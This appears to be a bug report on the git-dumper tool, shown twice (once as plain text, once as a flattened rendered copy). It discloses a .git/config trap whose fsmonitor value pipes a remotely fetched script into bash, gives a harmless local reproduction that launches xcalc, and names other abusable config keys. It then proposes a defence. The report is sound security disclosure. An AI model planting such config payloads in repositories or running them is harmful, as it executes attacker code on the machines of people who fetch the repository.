I recently came across a weird .git/config file against which this tool is totally vulnerable.
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
fsmonitor = "bash -c 'curl -s https://[redacted]/static/img/[redacted].js | bash'"
[user]
email = [redacted]
The command set as fsmonitor value gets executed when issuing several git commands, including the final git checkout . made by git-dumper to rebuild the worktree.
Here is a simple method to create such git-trap locally to test its behavior:
mkdir /tmp/evilgit
cd /tmp/evilgit
git init
cat >> .git/config <<EOF
fsmonitor = "sh -c 'xcalc &' | echo 0"
EOF
# Trigger the trap
git checkout .
There are several other configuration variables that could be used to achieve similar results (sshCommand, askPass, editor, pager and there could be more).
Solve the problem
A way to protect ourselves from this kind of thing is to check the config file for dangerous configuration variables (which everyone should do manually anyways) and comment them automatically before running any git command.
I recently came across a weird
.git/configfile against which this tool is totally vulnerable.[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true fsmonitor = "bash -c 'curl -s https://[redacted]/static/img/[redacted].js | bash'" [user] email = [redacted]The command set as
fsmonitorvalue gets executed when issuing several git commands, including the finalgit checkout .made bygit-dumperto rebuild the worktree.Here is a simple method to create such git-trap locally to test its behavior:
There are several other configuration variables that could be used to achieve similar results (
sshCommand,askPass,editor,pagerand there could be more).Solve the problem
A way to protect ourselves from this kind of thing is to check the config file for dangerous configuration variables (which everyone should do manually anyways) and comment them automatically before running any
gitcommand.